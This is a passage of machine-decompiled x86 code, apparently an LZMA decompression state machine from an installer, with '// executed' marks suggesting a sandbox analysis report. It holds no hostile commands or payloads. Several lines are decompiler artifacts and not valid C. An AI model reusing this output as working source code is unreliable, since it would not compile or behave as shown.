                          								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                          								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                          							}
                          							if( *(_t644 - 0x10) >= 0x1000000) {
                          								L148:
                          								_t487 = _t644 - 0x48;
                          								 *_t487 =  *(_t644 - 0x48) - 1;
                          								L149:
                          								if( *(_t644 - 0x48) <= 0) {
                          									goto L155;
                          								}
                          								goto L150;
                          							} else {
                          								L154:
                          								L146:
                          								if( *(_t644 - 0x6c) == 0) {
                          									L169:
                          									 *(_t644 - 0x88) = 0x18;
                          									L170:
                          									_t579 = 0x22;
                          									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                          									_t539 = 0;
                          									L172:
                          									return _t539;
                          								}
                          								L147:
                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                          								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          								_t484 = _t644 - 0x70;
                          								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          								goto L148;
                          							}
                          							L155:
                          							_t537 =  *(_t644 - 0x7c);
                          							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                          							while(1) {
                          								L140:
                          								 *(_t644 - 0x88) = _t537;
                          								while(1) {
                          									L1:
                          									_t538 =  *(_t644 - 0x88);
                          									if(_t538 > 0x1c) {
                          										break;
                          									}
                          									L2:
                          									switch( *((intOrPtr*)(_t538 * 4 +  &M004074A1))) {
                          										case 0:
                          											L3:
                          											if( *(_t644 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											L4:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											_t538 =  *( *(_t644 - 0x70));
                          											if(_t538 > 0xe1) {
                          												goto L171;
                          											}
                          											L5:
                          											_t542 = _t538 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t581);
                          											_push(9);
                          											_pop(_t582);
                          											_t638 = _t542 / _t581;
                          											_t544 = _t542 % _t581 & 0x000000ff;
                          											asm("cdq");
                          											_t633 = _t544 % _t582 & 0x000000ff;
                          											 *(_t644 - 0x3c) = _t633;
                          											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                          											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                          											_t641 = (0x300 << _t633 + _t638) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                          												L10:
                          												if(_t641 == 0) {
                          													L12:
                          													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                          													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t641 = _t641 - 1;
                          													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                          												} while (_t641 != 0);
                          												goto L12;
                          											}
                          											L6:
                          											if( *(_t644 - 4) != 0) {
                          												GlobalFree( *(_t644 - 4));
                          											}
                          											_t538 = GlobalAlloc(0x40, 0x600); // executed
                          											 *(_t644 - 4) = _t538;
                          											if(_t538 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t644 - 0x6c);
                          											if( *(_t644 - 0x6c) == 0) {
                          												L157:
                          												 *(_t644 - 0x88) = 1;
                          												goto L170;
                          											}
                          											L14:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											_t45 = _t644 - 0x48;
                          											 *_t45 =  *(_t644 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t644 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											L16:
                          											_t550 =  *(_t644 - 0x40);
                          											if(_t550 ==  *(_t644 - 0x74)) {
                          												L20:
                          												 *(_t644 - 0x48) = 5;
                          												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											L17:
                          											 *(_t644 - 0x74) = _t550;
                          											if( *(_t644 - 8) != 0) {
                          												GlobalFree( *(_t644 - 8)); // executed
                          											}
                          											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                          											 *(_t644 - 8) = _t538;
                          											if(_t538 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                          											 *(_t644 - 0x84) = 6;
                          											 *(_t644 - 0x4c) = _t557;
                          											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                          											goto L132;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t644 - 0x6c);
                          											if( *(_t644 - 0x6c) == 0) {
                          												L158:
                          												 *(_t644 - 0x88) = 3;
                          												goto L170;
                          											}
                          											L22:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											_t67 = _t644 - 0x70;
                          											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                          											if( *(_t644 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t559 =  *_t642;
                          											_t626 = _t559 & 0x0000ffff;
                          											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                          											if( *(_t644 - 0xc) >= _t596) {
                          												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                          												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                          												 *(_t644 - 0x40) = 1;
                          												_t560 = _t559 - (_t559 >> 5);
                          												__eflags = _t560;
                          												 *_t642 = _t560;
                          											} else {
                          												 *(_t644 - 0x10) = _t596;
                          												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                          												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                          											}
                          											if( *(_t644 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											} else {
                          												goto L137;
                          											}
                          										case 5:
                          											L137:
                          											if( *(_t644 - 0x6c) == 0) {
                          												L168:
                          												 *(_t644 - 0x88) = 5;
                          												goto L170;
                          											}
                          											L138:
                          											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          											L139:
                          											_t537 =  *(_t644 - 0x84);
                          											L140:
                          											 *(_t644 - 0x88) = _t537;
                          											goto L1;
                          										case 6:
                          											L25:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L36:
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											L26:
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												L35:
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												L32:
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											L66:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												L68:
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											L67:
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											goto L132;
                          										case 8:
                          											L70:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xa;
                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          											} else {
                          												__eax =  *(__ebp - 0x38);
                          												__ecx =  *(__ebp - 4);
                          												__eax =  *(__ebp - 0x38) + 0xf;
                          												 *(__ebp - 0x84) = 9;
                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          											}
                          											goto L132;
                          										case 9:
                          											L73:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L90;
                          											}
                          											L74:
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											L75:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t259;
                          											0 | _t259 = _t259 + _t259 + 9;
                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          											goto L76;
                          										case 0xa:
                          											L82:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L84:
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											L83:
                          											__eax =  *(__ebp - 0x28);
                          											goto L89;
                          										case 0xb:
                          											L85:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L89:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L90:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L99:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L164:
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											L100:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t334 = __ebp - 0x70;
                          											 *_t334 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t334;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L101;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L159:
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											L38:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											L40:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												L45:
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L160:
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											L47:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												L49:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													L53:
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L161:
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											L59:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												L65:
                          												goto L58;
                          											}
                          										case 0x10:
                          											L109:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L165:
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											L110:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t365 = __ebp - 0x70;
                          											 *_t365 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t365;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L111;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											goto L132;
                          										case 0x12:
                          											L128:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L131:
                          												__eax =  *(__ebp - 0x58);
                          												 *(__ebp - 0x84) = 0x13;
                          												__esi =  *(__ebp - 0x58) + 2;
                          												L132:
                          												 *(_t644 - 0x54) = _t642;
                          												goto L133;
                          											}
                          											L129:
                          											__eax =  *(__ebp - 0x4c);
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											__eflags = __eax;
                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                          											goto L130;
                          										case 0x13:
                          											L141:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L143:
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												L144:
                          												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                          												L145:
                          												 *(_t644 - 0x50) = 1;
                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          												goto L149;
                          											}
                          											L142:
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											L130:
                          											 *(__ebp - 0x58) = __eax;
                          											 *(__ebp - 0x40) = 3;
                          											goto L144;
                          										case 0x14:
                          											L156:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											while(1) {
                          												L140:
                          												 *(_t644 - 0x88) = _t537;
                          												goto L1;
                          											}
                          										case 0x15:
                          											L91:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L120;
                          										case 0x16:
                          											goto L0;
                          										case 0x17:
                          											while(1) {
                          												L145:
                          												 *(_t644 - 0x50) = 1;
                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          												goto L149;
                          											}
                          										case 0x18:
                          											goto L146;
                          										case 0x19:
                          											L94:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												L98:
                          												 *(__ebp - 0x2c) = __ebx;
                          												L119:
                          												_t393 = __ebp - 0x2c;
                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t393;
                          												L120:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													L166:
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												L121:
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												L122:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t400 = __ebp - 0x60;
                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t400;
                          												goto L123;
                          											}
                          											L95:
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												L97:
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L102:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													L107:
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L108:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L112:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														L118:
                          														_t391 = __ebp - 0x2c;
